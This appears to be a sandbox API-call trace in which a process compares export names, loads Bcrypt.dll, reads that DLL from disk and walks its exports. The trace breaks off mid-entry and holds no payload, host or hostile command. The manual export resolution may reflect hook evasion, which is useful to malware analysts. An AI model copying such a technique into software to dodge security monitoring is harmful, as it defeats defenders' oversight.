[0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0101.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0101.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0101.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0101.928] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0101.928] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0101.928] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0101.928] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.928] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0101.928] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.928] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0101.928] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0101.929] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.930] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.930] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0101.930] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0101.930] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0101.930] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0102.191] GetProcessHeap () returned 0x5b0000 [0102.191] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x40eb040 | out: hHeap=0x5b0000) returned 1 [0102.725] GetProcessHeap () returned 0x5b0000 [0102.725] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c8fe0 [0102.726] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0102.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0102.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0102.732] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0102.732] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0102.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0102.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0102.732] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0102.732] GetProcessHeap () returned 0x5b0000 [0102.733] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x26fa0) returned 0x2d22010 [0102.734] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0102.734] ReadFile (in: hFile=0x15c, lpBuffer=0x2d22010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d22010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0102.993] CloseHandle (hObject=0x15c) returned 1 [0102.994] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0102.994] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0102.994] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0102.994] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0102.994] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.994] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0102.994] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0102.994] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.994] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.994] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0102.994] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0102.994] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.994] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.994] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0102.994] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0102.994] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0102.994] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.994] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.994] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0102.994] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0102.994] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0102.994] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0102.995] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0102.995] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0102.995] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0102.996] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0102.997] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", 